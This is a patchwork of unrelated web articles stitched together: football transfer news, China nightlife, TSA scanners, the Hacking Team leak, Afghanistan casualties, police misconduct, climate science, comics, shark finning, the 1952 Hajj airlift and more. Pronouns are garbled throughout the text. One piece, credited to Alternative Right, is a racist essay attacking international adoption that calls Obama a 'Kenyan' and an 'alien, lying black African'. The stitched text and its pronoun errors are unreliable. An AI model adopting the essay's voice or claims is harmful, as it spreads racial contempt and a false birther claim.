Louis van Gaal will end their first season at Old Trafford without a trophy, having exited the Capital One Cup to League One side MK Dons and the FA Cup to Arsenal.
In the Premier League, they are currently 16 points behind champions Chelsea but are set to meet their preseason target of a top-four finish as they have a six-point advantage over fifth-placed Liverpool with two games of the season remaining.
They added: "As the season approaches its conclusion, we are pleased with the team's performance in Louis van Gaal's first season as manager and are well positioned to achieve a top four finish in the Premier League and to return to European football next year.
"As we look forward to next season, on the playing side we expect to be challenging for trophies in all competitions and on the commercial side we are excited by the numerous opportunities for further growth, including the first year of our ten year partnership with adidas."
Information from the Press Association was used in this report
Carlos Bacca would be open to Premier League move, according to Guillem Balague
Carlos Bacca: Excelled for Sevilla once again last season
Sevilla striker Carlos Bacca could be on their way to the Premier League, according to Spanish expert Guillem Balague.
The Colombian has been heavily linked with Manchester United and Liverpool in numerous newspapers in recent weeks, after their heroics inspired Sevilla to their second successive Europa League crown last season.
We take a look at Carlos Bacca's goals for Seville in La Liga this season. We take a look at Carlos Bacca's goals for Seville in La Liga this season.
United, also linked with Sergio Ramos and Bastian Schweinsteiger, are in the market for another goalscorer after they decided not to extend the stay of the misfiring Radamel Falcao, while rivals Liverpool need added firepower to get them back into the Champions League, after faltering in front of goal last campaign.
And Balague insisted that Bacca, currently on duty with Colombia at the Copa America in Chile, would be open to a move to our shores or Serie A, where they are also attracting admiring glances.
Manchester United and Liverpool are both chasing a striker and Europa League winner Carlos Bacca is keen on Premier League.
“Carlos Bacca at the end of the season told Sevilla they would like a way out,” Balague told Sky Sports News HQ.
“Sevilla would like them to stay, but they do know there is interest from the Premier League and Italy.
Spanish football expert Guillem Balague says it would cost Manchester United €200m to sign Sergio Ramos and Balague does not expect the deal to happen. Spanish football expert Guillem Balague says it would cost Manchester United €200m to sign Sergio Ramos and Balague does not expect the deal to happen.
"He likes the idea of coming to the Premier League, of course they have been abroad for a few years and would be happy to continue that progression abroad.
"Although Sevilla expect an offer, it hasn't arrived yet."
I'm not the biggest participator of nightlife in China, but I will get out once in a while to relax and have fun like the rest of the world! There are a few very standard things in most basic clubs in China. (with exceptions of cool big city multi level mega party rooms) Every club is very overpriced, and you usually have to order at least a couple hundred rmb worth of liquor to even get started. Also, there is a T-shaped stage in most clubs meant for dancing. A DJ will usually be spinning pretty decent music, but sadly the speakers are of such poor quality that your ears are ready to bleed at the slightest drop of bass. And lastly, the clubbing culture of China is very different. People don't get drunk and dance, that's only for the silly show offs. Most will casually hover around their booths or drinking tables all night, playing dice. Dancing will almost always start with the loud drunk foreigner doing their white-boy dance moves. And also, grinding….never seen it yet.
What are your experiences going clubbing in China? Can you relate?
Advertisements
TSA: No More Graphic, Full-Body Airport Scans
Enlarge this image toggle caption Ethan Miller/Getty Images Ethan Miller/Getty Images
The Transportation Security Administration has told Congress that it's finished retrofitting airport scanners to blunt a widely criticized technology that shows graphic detail of a passenger's body as they or they go through security checkpoints.
In a letter Thursday from TSA Administrator John Pistole to the House Homeland Security Committee, the agency says that as of May 16, all U.S. airport scanners that had been equipped with the offending Advanced Imaging Technology, or AIT, have been loaded with software called Automatic Target Recognition, which shows only generic images of the passengers.
The change was ordered by Congress in 2012 and was to have been completed by Friday.
"As of May 16, 2013, all [Advanced Imaging Technology scanners] are equipped with ATR capability," they said in their letter, The Hill reported. "Additionally, TSA's procurement of next generation AIT requires ATR capability."
NBC says that the retrofitted scanners "will now only show a generic outline of a passenger to the operator. A colored box pops up if the full-body scanner detects a potentially forbidden item."
As Mashable notes:
The NSA has been spying on politicians and common citizens, domestically and abroad, for decades now. Now, a recent online hack of private documents has revealed that national governments are able to obtain software services to hack into Bitcoin and other private digital currency accounts through an Italian subcontractor.
400GB of documents captured from a popular international surveillance technology company called Hacking Team has been uncovered by CSO Online's Steve Ragan. These documents reveal what spy technology is available and how many countries are investing in it.
Bitcoin, Litecoin and other digital currency wallet hacks are one of many services provided by Hacking Team to national governments for anywhere from tens to millions of dollars. Moreover, the Hacking Team has made it to reporters Without Borders' Enemies of the Internet list for their history of espionage.
The entity that hacked the Hacking Team is unknown at this time, but they managed to release a 400GB torrent file with documents files with details of what they do and who they do it with. It's worth mentioning that the Department of Defense is listed as not currently active while the Drug Enforcement Agency (DEA) has a renewal in progress.
Documents reveal that the FBI had an active maintenance contract with Hacking Team until June 30, 2015. The biggest national spenders on this type of technology are Mexico, with over 5 million Euros; Italy invested over 4 million Euros and Morocco with over 3 million. Keep in mind that the larger and more advanced the country, the less likely they may need the company's surveillance services.
The countries that the Hacking Team has already done business with include: Egypt, Ethiopia, Morocco, Nigeria, Sudan, Chile, Colombia, Ecuador, Honduras, Mexico, Panama, United States, Azerbaijan, Kazakhstan, Malaysia, Mongolia, Singapore, South Korea, Thailand, Uzbekistan, Vietnam, Australia, Cyprus, Czech Republic, Germany, Hungary, Italy, Luxemburg, Poland, Russia, Spain, Switzerland, Bahrain, Oman, Saudi Arabia, and the United Arab Emirates. Russia and Sudan have been associated with Hacking Team but are currently listed as “Not officially supported”
Recently, Hacking Team's Christian Pozzi was exposed by the hacking incident, as the company's security engineer's password from Firefox was published as part of the massive data dump. They took to Twitter to issue denials. When these fell on deaf ears, they warned that the 400GB download contained viruses. Their Twitter account was compromised and later deleted.
The Hacking Team's Twitter account has also been compromised, with the unknown hackers publishing a link to the data download and writing:
Story highlights Afghanistan and Germany's foreign ministers meet in Kabul
2 American troops, 1 U.S. civilian are shot dead in eastern Afghanistan, ISAF says
1 Italian soldier dies in western Afghanistan, 3 are wounded, the coalition adds
NATO is winding down its military operations in Afghanistan
Three coalition troops and one civilian were killed Saturday in Afghanistan -- their deaths coming in two separate instances, one in the eastern part of the country and the other in the west -- NATO's International Security Assistance Force said.
Two American soldiers and an American civilian were shot dead by a gunman wearing an Afghan army uniform in the eastern Paktika province, according to an ISAF spokesperson.
The shooter was killed and another was arrested, the coalition force said in a statement later Saturday. By then, the forward operating base where the attack occurred had been secured.
Separately, an Italian soldier was killed in western Afghanistan's Farah province by "hostile elements" targeting a convoy of military advisers, the Italian defense ministry said.
Three other Italian soldiers were wounded in that attack.
The incidents come days after 10 schoolchildren and two ISAF soldiers were killed in a bombing at a bazaar in eastern Paktika province. That province has been a hotbed for insurgent attacks, including a suicide bombing last October at a joint NATO-Afghan army base that wounded 45 Afghan soldiers.
U.S. President Barack Obama announced in February that some 34,000 U.S. troops in Afghanistan will return home within a year. That would cut the number of U.S. forces in the country by more than half.
This follows NATO's decision in May 2012 to accept Obama's exit strategy for the war-torn Asian nation that ends their alliance's combat operations in 2013 and withdraws all its military forces by the end of 2014.
Afghan Foreign Minister Zalmai Rassoul met Saturday with their German counterpart Guido Westerwelle at the presidential palace in Kabul.
Among other matters, the two discussed the security transition, the Afghan government's efforts to maintain peace and next year's elections in the country, according to a press release from the Afghan foreign ministry.
The White-Guilt Adoption Industry
Why are American white women so anxious to adopt a “dusky little heathen” child from the Third World?
Angelina Jolie among the Wretched of the Earth (photo: angelinajolie.com)
It's the latest fad of the White Woman Saviour, and it carries high status. A white American woman must adopt a Third World child (preferably a non-white) to really keep up with the savior image. It's a grand American tradition, dating back to the early 19th century Christian missions. Only today, you don't have to be Christian at all. You just have to be white, female, (and preferably single). Look at Laura Ingraham, famous “conservative” radio talk show host. One child (Maria, a Guatamalan girl) wasn't enough. They had to adopt a Russian boy, Dmitri.
So what are the real issues involved is this social phenomenon?
White women are obviously still operating on the grand old Christian missionary template. But what about the “single mom” bit? Is that an extra, thrown in to aggrandize the nobility of motherhood? Is that about self or about the child? What happened to the father figure? Is that not important any more? Ingraham is quite forthright about their Christianity (Catholic). Is the father figure not in that picture?
And why the craze for foreign babies? America has plenty of “home grown” infants and children available. Shouldn't an American patriot mother's first concern be for American babies? Why the rush to bring alien children here? Are Third World (or even European) countries anxiously adopting American children? Of course not. Let's be honest: America is the dream country. America is where everyone wants to come. America is the place they want their children to come.
Angelina Jolie really dramatized the role of the American white woman savior grabbing up the darkest, blackest babies, from deepest, darkest, most miserable Africa (as well as Cambodian, Vietnamese, and possibly Syrian). They and Madonna. That's the extreme, of course. That is the zenith of the white woman savior image. Shall we not ask, however, why they didn't adopt an American Negro child, if race was the issue? Or why not simply adopt an American white child? Is there something wrong with that? Or, is it not dramatic enough to suit the heroic vision of self-importanc? Do these white women have any knowledge, or even concern, about the foreign child's present and future feelings, or the adopted child's psychological development?
It is difficult to avoid the immediate conclusion that these American white woman saviors are acting out their own sense of superiority and advantage. (Some might say, guilt, but, that's not too likely.) They are romatically reaching out to the farthest corners of the globe to save a desperately lost and innocent child. What could be more noble, more heroic, more American? (Key focus here is on “noble”, and “heroic,” that is to say, on the woman's feelings.)
Alas, it doesn't always work out so well. One white woman savior family in Shelbyville, Tennessee figured they got a bad deal, and sent their little alien angel back to Siberia. Russia threatens to suspend all American adoptions? Please! A great blessing it would be. What do we need 61,600 Russian kids over here for? What about the American kids that need adoption? May all foreign countries quickly follow Russia's suit. No more non-American babies adopted by Americans!
This whole international adoption routine is all a social status scheme. It insults all countries, who love to hate America anyway– while obviously trying to take every possible advantage of America. Americans disgrace America when they fall into this flesh fad of adopting foreigners. Sure, there are some wonderful stories. Fairy tale stories. It truly is a splendorous dream, and it has worked out beautifully in some cases, or certainly as well as anyone could ever expect when a child is taken from its home and put in another, foreign home, and of a dramatically different race.
But that's not really the point. This is about nationalism, or, we should say, patriotism versus individualism. The individual fantasy can, unfortunately, often override the good of the community, or the country. It is as if a white woman savior sees America as the best nest of the world, and they want to bring up the worst of the worst here. This makes them feel, in fact, patriotic. What more noble thing could an American white woman do? Yet, objectively, in terms of the America, this “customary” call for the world's most unfortunate needs to be reevaluated–especially when there are American-born children in dire straights. Is it less patriotic for an American woman to reach out to Americans?
I think we can dispense with the foreign vision at this point. Our Kenyan President has certainly reduced the American image to one disdained, having offended just about every important country in the world, and having done little or nothing for those in the greatest need. Barry “Obama” Soetoro, as the great Black Father has done everything they can to denigrate America (and glorify himself), so that foreign countries see America only as a free ticket to a home, a Cadillac, and a college education–while these things must be denied white Americans.
America has had enough of foreigners. Take it from an Indian. It is time to close the doors. Nationhood demands it. No one would ever expect a Kenyan to become tribal chairperson of the Arapaho, or a Nigerian to become chief of the Cheyenne. No one would expect a Saudi Arabian to become Prime Minister of Israel. Yes, an alien, lying black African became president of the United States–but that's only because of the white liberal Communist traitors manipulating their way into power. It isn't because it was the right, moral thing to do. It was an Oedipal thing to do. It was, collectively, a Freudian thing to do, perverted, self-destructive, and uneducated.
I say American white woman should adopt American white children. This business of bringing in the “dusky little heathen” is racism. It is an incredibly careless, selfish move, actually. It is bad for the child, and for the country. Yes, it is a noble instinct in the American white woman. It truly is. But, it is gone awry at this point, and needs advice and guidance.
Perhaps the white race needs some humility at this point. The white woman should honor their own white race. Do they feel above race? Do they really feel so suprior to other races as to save them? I say their white “racial” capital has used up. They need to love their own race. If they don't, they are a curse to the country. Beware.
Source: Alternative Right.
A constable with the Abbotsford Police Department in B.C. is facing criminal charges and 16 other officers are under investigation for allegations related to the integrity of statements used in a number of criminal cases to obtain search warrants.
Abbotsford officer facing conspiracy, trafficking charges
Abbotsford, Mission top Canada's homicide ratings
Const. Christopher Nicholson has been charged with six counts of attempting to obstruct justice, three counts of breach of trust, and one count of unsafe storage of a firearm, according to the B.C. Criminal Justice Branch.
They have been ordered suspended without pay.
Nicholson is scheduled to go to trial in May 2016 on on criminal charges including three counts of breach of trust and six counts of attempting to obstruct justice. (Facebook)
The Office of the Police Complaints Commission, which announced the investigation Wednesday, said when Nicholson was arrested in May 2013 they were also charged with one count of conspiracy to traffic in a controlled substance.
But Neil Mackenzie, a spokesperson for B.C.'s Criminal Justice Branch, said the Crown entered a stay of proceedings on that charge.
Once a stay is entered, the Crown, should it choose to do so, has up to a year to reactivate the charge.
Even though Nicholson was arrested and charged nearly two years ago, the OPCC said disclosure of the larger investigation was delayed until now, in order to complete a number of "sensitive investigative steps."
Abbotsford police chief responds to allegations
At the time Nicholson was first arrested in 2013, Abbotsford police Chief Bob Rich told reporters the allegations involved an officer supplying information to a drug dealer so the dealer could avoid being arrested.
On Wednesday, Rich said the investigation started thanks to other police officers who came forward with information.
"In the fall of 2012, two of our members came forward and said they thought we had a problem with one of our members and their integrity showed that day, and we immediately took their concerns seriously and ended up asking Vancouver [Police Department] to take on an investigation into the conduct of Const. Nicholson," Rich said.
The chief pointed out that the investigation into the other 16 officers is for alleged misconduct under the Police Act, not the Criminal Code.
Rich also made a point of standing up for the other police officers currently under investigation, pointing out that Nicholson is the only police officer who has been charged criminally.
"We have a large number of members under investigation under the Police Act. I need you to understand that if I did not have confidence in the integrity of these members, I would have suspended them. I have not done that," they said.
They are, in my view, great cops. They continue to serve this community even while under investigation, and I am proud of how they have conducted themselves during difficult times."
Rich also said that the officers in question have been taken off drug investigations and moved to other duties, and that the Abbotsford police have changed the way they handle informants following a Vancouver police audit.
Some court cases on hold
The OPCC said the Vancouver Police Department investigation uncovered further allegations of misconduct against 16 other members of the Abbotsford Police Department, which has 217 officers.
It also determined many of the allegations against officers deal with the information provided to judicial officials in order to obtain search warrants.
Abbotsford Police Department spokesperson Const. Ian MacDonald talks to reporters about the investigation into a number of officers for offences under the Police Act. (Eric Rankin/CBC) "Furthermore, what remains an active concern to the OPCC is the extent to which the search warrants in issue may have contributed to potentially unsafe prosecutions," said the statement.
The complaints commission said it has not been able to adequately determine the extent to which prosecutions may have been compromised "due to the lack of adequate disclosure from the police."
It said that delay is due to legal impediments arising from the complexity of the case and the sheer magnitude of investigative materials.
"Several investigations have been suspended pending the disclosure of the investigative materials in order to ensure that the related criminal proceedings are not prejudiced," said the commission statement.
After they were charged in May 2013, Nicholson made their first appearance in B.C. Supreme Court in July. Their trial date has been set for May 26, 2016, and their next scheduled court appearance is Aug 28.
The complaints commission will release a summary of its final report on the investigation to the public once its probe is complete.
News coming out of Sauber suggests Venezuelan Pastor Maldonado is returning to the Hinwil based team to replace driver Pascal Wehrlein for the rest of the season.
German Wehrlein ‘sat out' at the Australian Grand Prix, citing medical reasons for their choice. Ferrari's reserve driver Antonio Giovinazzi, duly stepped up in Melbourne and impressed many with their debut drive in F1.
Since last weekend, there have been numerous stories linking Giovinazzi to the Sauber seat permanently. This was denied by Sauber Principal Monisha Kaltenborn, and secondly by Ferrari themselves.
Sauber want someone with more experience as they try to challenge for points, and Ferrari want to develop Giovinazzi slowly stepping them up the works team for next season.
Step forth Pastor. Maldonado representatives were spotted in Hinwil, and it appears that a deal has been struck for the former Lotus, and Williams driver to make a sensational return to formula one. The deal is believed to be only for this season, with the option of a second year depending on performances. Pastor will once again bring significant sponsorship from their home country, which appears to be the defining factor in the deal.
Pascal in the meantime, will be ushered back to Mercedes with the possibility of a works drive with Renault materialising. Palmer is known to be under immense pressure, and it depends on just how long Enstone chiefs will continue with him.
Share this: Twitter
Facebook
Reddit
Pinterest
Tumblr
Email
Like this: Like Loading...
Monckton Myth #13: The Magical IPCC
Posted on 17 February 2011 by dana1981
And now, for its next trick, the IPCC will make the Medieval Warm Period disappear!
As a new addition to the Monckton Myths, this post examines a claim commonly made by Christopher Monckton that the Intergovernmental Panel on Climate Change (IPCC) "ingeniously wiped out" and "artificially eradicated" the Medieval Warm Period (MWP). "Skeptic" blog WattsUpWithThat has similarly claimed that the IPCC "disappeared" the MWP.
Origins of the Myth
Monckton makes this claim ("now you see it, now you don't") in their Apocalypse? No! article. As shown on page 42 of this article, the myth seems to be based on Figure 7.1c from the IPCC First Assessment Report (FAR):
Figure 1: IPCC FAR Figure 7.1c - Schematic diagram of global temperature variations for the last thousand years. The dotted line represents conditions near the beginning of the twentieth century.
As you can see, IPCC FAR Figure 7.1c appears to show the MWP quite prominently, with a peak warmer than the temperature as the end of the graph. But it's a rather strange figure - the temperature axis doesn't even have any numbers, and it looks hand-drawn. Where did it come from?
Pulling a Lamb out of a Hat
Jones et al. (2009) explore the origins of this figure. They note that the figure caption specifically stated that it was a schematic diagram, and not an actual temperature reconstruction.
"as far as palaeoclimatologists were concerned the diagram was nothing more than how it was originally described in the caption: a schematic."
Jones et al. trace the schematic diagram back to a series used by H.H. Lamb, representative of central England, last published by Lamb (1982). However, Lamb is plotting 50-year averages here, and the final data point appears to be 1950. Jones et al. superimpose IPCC FAR Figure 7.1c (black) with Lamb's central England temperature (red) and add the Central England Temperature data up to 2007 (blue):
Figure 2: The black curve and the x- and y-axes are a redrawn version of IPCC FAR Figure 7.1c. The red curve is from Lamb (1982). The amplitude of this curve has been scaled to correspond to that of the black curve. The Lamb (1982) time series does have an explicit temperature scale, and the best-fit scaling between this curve and the IPCC curve indicates that one tick-mark interval on the IPCC figure corresponds almost exactly with 1°C. The blue curve is a smoothed version of the annual instrumental Central England Temperature record from Manley (1974, updated) including the last complete year of 2007. This has been smoothed with a 50-yr Gaussian weighted filter with padding.
Central England temperatures have risen by over 1°C since Lamb's last measurement. Jones et al. also note about Lamb's schematic:
"At no place in any of the Lamb publications is there any discussion of an explicit calibration against instrumental data, just Lamb's qualitative judgement and interpretation of what they refer to as the ‘evidence'....Greater amounts of documentary data (than available to Lamb in the early 1970s) were collected and used in the Climatic Research Unit in the 1980s. These studies suggest that the sources used and the techniques employed by Lamb were not very robust (see, eg, Ogilvie and Farmer, 1997)."
In short, Figure 7.1c from the IPCC FAR was based on Lamb's approximation of the central England temperature. It was intended only as a schematic diagram, and known not to accurately reflect the global average temperature.
Advancements in Science
The Lamb diagram was dropped from the Supplementary IPCC report in 1992. Subsequent IPCC reports showed the first northern hemisphere temperature reconstructions based on proxy data. The IPCC Second Assessment Report (SAR) examined Bradley and Jones (1993). The IPCC Third Assessment Report (TAR) examined Jones et al. (1998); Briffa (2000); Crowley and Lowery (2000); and of course Mann, Bradley, and Hughes (1998) and (1999) (the so-called "hockey stick").
The IPCC TAR featured the "hockey stick" fairly prominently. The rather widespread belief that "the hockey stick is broken" and "suppressed" the MWP may contribute to this myth that the IPCC "disappeared" the MWP. However, although the MWP was not shown as prominently in the "hockey stick" as most other reconstructions due to the statistical methods employed in the study, all subsequent northern hemisphere temperature reconstructions have confirmed the general "hockey stick" shape.
Figure 3: Various northern hemisphere temperature reconstructions using climate proxy records (Source: NOAA NCDC)
Furthermore, all of these reconstructions demonstrate that the present average northern hemisphere temperature is likely hotter than at the peak of the MWP. It's important to note that northern hemisphere temperature reconstructions are obviously much more representative of global temperatures than the temperature in central England. And it's also worth noting that most of the warming during the MWP was geographically located at high latitudes in the northern hemisphere.
Magicians without Secrets
On top of all this, the IPCC is very careful to discuss exactly what we know about MWP temperatures. Here is an excerpt from the IPCC Fourth Assessment Report (WG1 Chapter 6 page 468):
"The evidence currently available indicates that NH mean temperatures during medieval times (950–1100) were indeed warm in a 2-kyr context and even warmer in relation to the less sparse but still limited evidence of widespread average cool conditions in the 17th century (Osborn and Briffa, 2006). However, the evidence is not sufficient to support a conclusion that hemispheric mean temperatures were as warm, or the extent of warm regions as expansive, as those in the 20th century as a whole, during any period in medieval times (Jones et al., 2001; Bradley et al., 2003a,b; Osborn and Brif a, 2006)."
The bottom line is that the IPCC did not "disappear" the MWP. Rather, the IPCC has done its job correctly by evaluating the best available data and scientific studies at the time of each report. As climate scientists obtained more temperature data, it became clearer and clearer that the MWP was not hotter than present temperatures.
Memo to Christopher Monckton: a schematic of central England temperatures to 1950 is not quite the same as a reconstruction of northern hemisphere temperatures to 2007! The IPCC has done some impressive work, but it's no Harry Houdini.
Monckon vs. Monckton
Monckton's favorite argument is "climate sensitivity is low". But if the MWP was particularly hot, that means there was a fairly large temperature change about 1,000 years ago. The hotter the peak of the MWP, the larger the temperature change, and the more sensitive the climate was to the factors causing that change (mainly increased solar activity and decreased volcanic activity). Arguing for a hot MWP is arguing for a high climate sensitivity to these natural factors, and if the climate is sensitive to an energy imbalance caused by a change in solar or volcanic activity, there's no reason it wouldn't also be sensitive to changes in greenhouse gases as well.
In short, a hot MWP also means a high climate sensitivity. By arguing for a hot MWP, Monckton is contradicting their own favorite argument.
NOTE: This post (written by Dana Nuccitelli [dana1981]) is also the Intermediate rebuttal to "IPCC 'disappeared the MWP".
Valiant Comics has just released a new trailer for their upcoming four issue series Book of Death. The book will feature a number of Valiant's major players including X-O Manowar, Bloodshot, Ninjak, Unity, and the Harbinger Renegades. It will detail how they lived and how they died.
Creators Robert Venditti, Robert Gill, and Doug Braithwaite will bring the story to life as they explore the Book of the Geomancer. The book and its bearer, the last of the Geomancers, has recorded the events from the coming cataclysm to the dawn of the 41st century.
The Eternal Warrior must protect the last Geomancer from friend and foe alike in order to stop the impending Dark Age threatening to take over the Valiant Universe.
More from Bounding Into Comics
Book of Death aims to “reveal glimpses of the future of the Valiant Universe and, with it, many of the monumental events and occurrences that our heroes will face,” noted Valiant CEO and Chief Creative Officer Dinesh Shamdasani. They went on to reveal, “Major characters will die, while others will be introduced for the very first time. The loves, the losses, and the betrayals that await our biggest characters…it all starts here. … Book of Death will have an immediate impact on not only the stories that follow it in 2015, but on the next decade of the Valiant Universe as well.”
The series will also be accompanied by four one-shots examining The Fall of Bloodshot, The Fall of Ninjak, The Fall of Harbinger, and The Fall of X-O Manowar. There will be a ton of talent working on these issues including Jeff Lemire, Matt Kindt, Joshua Dysart, Kano, Clayton Henry, and Trevor Hairsine.
While Book of Death journeys into the future, Book of Death: Legends of the Geomancer will take a look at the very beginnings of the Valiant Universe. It will tell a tale of the very first Geomancer and how their decision has affected the entire fate of the world. Fred Van Lente and Juan José Ryp will bring to life Book of Death: Legends of the Geomancer
Valiant has put together some top talent for this summer series and if it is as good as The Valiant was, this will be a series you won't want to miss. I know I have added all of it to my pull list and can't wait to sit down and start reading just two weeks from now. I hope we get to see the Immortal Enemy make a return!
Book of Death and Book of Death: Legends of the Geomancer hit comic book shelves on July 15th.
So let it be written…So let it be done…
(Visited 283 times, 1 visits today)
Holding RBI Governor Urjit Patel responsible for ineffective handling of the crisis post the demonetisation drive, All India Bank Employees Association vice-president Vishwas Utagi on Wednesday said that bank unions are adamant on their demand for the former's resignations as well as lockdown of the apex bank.
Advertising
Questioning the failure of the RBI as the regulatory system, Utagi said that Patel, who hasn't uttered a word till now, should resign with immediate effect.
“Since two weeks, the bank employees are working from eight in the morning till midnight including weekends. Still, there are truckloads of work to do. There has been absolutely no cooperation from the RBI's side,” Utagi told ANI.
“It added to the mess by banning cooperative banks from exchanging old notes or accepting deposits,” they added.
Citing the present situation as a clear mess, Utagi further said that there have been in total ten lakh employees at various banks who are working in and out in a situation where there are inadequate cash counting machines, fake notes detection machines and manpower security personnel.
Advertising
The India Bank Employees Association vice-president's assertion come as a united opposition is cornering the government in Parliament and demanding Prime Minister Narendra Modi to explain the rationale behind imposing such a decision.
Photos allegedly taken in Mabul island has sparked outrage again from conservationists who say that such acts were contradictory to the state's eco tourism. ― Picture courtesy of Danau Girang Field Centre
KOTA KINABALU, July 19 ― New gory photos of shark finning said to be taken in the dive haven of Mabul, off Sabah's famed Sipadan island are circulating on the internet and have enraged environmentalists, including state Tourism, Culture and Environment Minister Datuk Seri Masidi Manjun.
Masidi who has been advocating shark protection in Sabah's waters denounced the heinous act, but indicated that there would be little the authorities could do as there is currently no law banning shark finning in the state.
“The photos speaks volumes of what I and many other Sabahans have been advocating for the last five years,” they said, adding that they had given their thoughts on the problems many times in the past.
Asked if there would be investigations based on the photos, they replied: “What difference does it make when there is no law against this despicable act?”
The photos on Facebook show several sharks with its fins cut off floating in a sea of blood within a water village area, along with allegations that the photos were taken at Mabul island, a locally-inhabited island within the Tun Sakaran Marine Park.
The island itself is home to a fishing community living in several water villages, as well as a host of dive resorts ranging from backpacker to luxury stilt chalets.
Conservation research group Danau Girang Field Centre director Dr Benoît Goossens who posted on their Facebook page said that it was incomprehensible to think that such an act was allowed to be carried out near a world class diving island like Sipadan.
“The massacre has to stop! It is crazy to think that it is happening a few miles from the best diving spots where divers go to see sharks. I think Sabah should make a stand and put the Sharks under special protection in Sabah's waters and enforce it,” they said.
“Sharks attract divers from all over the world to Sabah, it is a huge tourism industry bringing millions to the state. Sabah needs to get its own law, ban shark killing and finning and enforce the law in its waters,” they said.
Following reports of a 80 per cent decline of sharks in its waters, the state has been pushing for the federal government to ban shark hunting and finning by amending its Fisheries Act. However, its three year proposal was dismissed claiming that shark hunting was not a huge business in the state.
Masidi has since then come out to say that the state will enforce its own shark sanctuary through its marine parks soon.
The Tun Sakaran marine park in Semporna, Tunku Abdul Rahman marine park fronting the state capital, and the proposed Tun Mustapha marine park in Kudat would be declared shark sanctuaries and off limits to shark fishing.
The three parks total some two million hectares and is habitat to about 80 per cent of the state's shark population.
The Tun Mustapha Marine Park is set to be launched this Sunday.
Today Tonight staffers are today celebrating after fighting off a serious executive push to drop the consumer affairs program.
Executive heads at Seven wanted to incorporate its content into a one hour news bulletin, which would have led to job losses of more than 50 in the national show's staff.
But a senior producer at the program told Mumbrella today that TT would return to air on Monday, after a three week experiment by Seven of running a one hour news bulletin from 6pm.
“We're not going anywhere,” the TT source said.
ADVERTISEMENT
“We have been working hard and have stock-piled a heap of stories, and we will be all ready to go on Monday.”
The 6.30pm program was dropped by Seven during the bushfire crisis, but stories produced by Today Tonight staffers were included in the one hour bulletin.
Ten days ago a senior network executive told Mumbrella that TT's future was up in the air.
The speculation came just as Seven hired former Ten newsreader Helen Kapalos to host the Sydney and Melbourne editions, while Sharon Gadhela will front the Brisbane version.
The annual Islamic Hajj pilgrimage to Mecca kicks off this week, with some 2 million people expected to join. The religious occasion is considered to be the largest annual mass gathering in the world and is, unsurprisingly, accompanied by a litany of logistical hurdles, ranging from transportation to accommodations.
But it could be worse: in 1952, the problem was particularly acute. As TIME reported then, far more pilgrims were headed for Saudi Arabia, where Mecca is located, than had been expected, in part because Saudi Arabia had waived an entrance fee for pilgrims that year. As a result, flights from Beirut–a common layover–were overbooked, and thousands of people found themselves stranded in Beirut on their way to Mecca.
The Brief Newsletter Sign up to receive the top stories you need to know right now. View Sample Sign Up Now
One American diplomat in Lebanon, Harold Minor, saw an opportunity to lend a helping hand and, in so doing, also attempt to mend the U.S.'s then-shaky relations with the Arab world. Here's TIME's account of the ensuing “miracle in Washington:”
Minor promptly dashed off a “night action” (most urgent) cable to Washington, pointing out that here was a real chance for the U.S. to make friends in the Arab world. Something of a miracle then happened: the State Department got the point. At Rhein-Main airport in Wiesbaden, Germany, at Wheelus Field in Tripoli, at Orly Field in Paris, U.S. airmen were suddenly alerted for special duty. Three days later, the first of 13 huge U.S. C-54s landed at Beirut's airport. Next morning Operation Hajj was under way… Five days later the last of 3,763 stranded pilgrims was loaded aboard the last flight. The airlift had traveled a total of 121,800 miles. Some of the U.S. airmen had spent 27 out of 40 hours in the air, but the trips had been more than worth it. The pilgrims' airlift had done more good than any other act of the U.S.'s otherwise fumbling and unimaginative action and inaction in the Middle East. It was the one success U.S. diplomacy could claim in a week of continued crises.
The operation was reportedly a huge success and drew praise from Arab leaders and TIME readers alike. Wrote one reader, Nashville resident Robert Alvarez:
What a thrill—to read of our big, bumbling State Department actually showing a little imagination. This is the kind of thing they ought to be doing every day in the year—instead of once a decade . . .
Read the 1952 story about Operation Hajj: Airlift for Allah
Write to Noah Rayman at noah.rayman@time.com.
DENTON -- Max Briggle lives their life just like any other 9-year-old boy, and now it says so in writing on their birth certificate.
"He's always going to be transgender, but having that piece of paper, my hope is that it's going to make it a little easier for him," said Amber Briggle, Max's mom.
Max was born Mary Grace. WFAA has covered their story in the past, including when their family invited Texas Attorney General Ken Paxton to their home for dinner.
They have become outspoken advocates for transgender kids.
Now, all of Max's documents reflect their identity, with their new name and gender identity. The Briggles said they have successfully changed their legal name, as well as their Social Security card and birth certificate.
"I feel like this is another milestone," said Amber Briggle.
They believe this amended documentation is essential for their son in a time when there's an active debate on transgender rights. Proposed bathroom bills like SB 6 would mandate that people use the bathroom that matches the sex on their birth certificate.
"As long as we're going to pass laws saying which facilities you can and can't use, it's awfully nice to have a document saying they can use it," said Briggle. "At the same time, I just feel like it's so unnecessary. Why do I have to change my son's birth certificate so they can be treated like the boy that they are?"
Changing Max's name required a court order. Their birth certificate is an unusual case. They have what is called a Consular Report of Birth Abroad issued by the U.S. State Department because they were born in The Netherlands.
The document functions as a birth certificate for all official purposes, the State Department said, and changing it required a letter from physician meeting specific requirements. Max's CRBA now states their sex as male.
"The fact that they were born abroad made it significantly easier for us than had they been born here in Texas," said Briggle. "In which case, I'm not sure it would have happened at all. At least not at this age."
Texas Health & Human Services told WFAA that changing the sex on a Texas birth certificate requires a court order. In 2016, only 34 people in the entire state met that requirement and were able to change their vital documents.
For the Briggles, the new document is cause for celebration. They're planning a baby shower this weekend, with blue decorations and even traditional food from The Netherlands. They're calling it a do-over.
"I want to have a baby shower for my baby boy," Briggle said. "He's always been my son. But it's been this very long, gradual process over nine years for us to get to this point, and I feel like that needs to be recognized."
Copyright 2016 WFAA
Description
The Workshop Asset Manager contains hundreds of growable building assets organized into sub-collections based on the type, level, and in some cases, the size of the building. This will provide you with much more control over your assets so that you can get the widest variety of assets possible.
There are several ways to use the Workshop Asset Manager.
Growable Asset Starter Pack - The Starter Pack should be the first collection listed below. This collection contains over 200 growable assets spread evenly between the different building types, levels, and sizes. This is a quick and easy way to start and will instantly provide you with a much larger variety of assets than ships with the game. You will still see some repeating buildings, but it shouldn't be nearly as noticeable as with only default assets. These should all work nicely together with no errors. Simply navigate to the Growable Asset Starter Pack collection and click the Subscribe to All box at the top. The Workshop will then download about 650 megabytes of assets to your computer, so it might take a while. If you're on a slow connection, you might want to subscribe to each of them one at a time instead of using Subscribe to All.
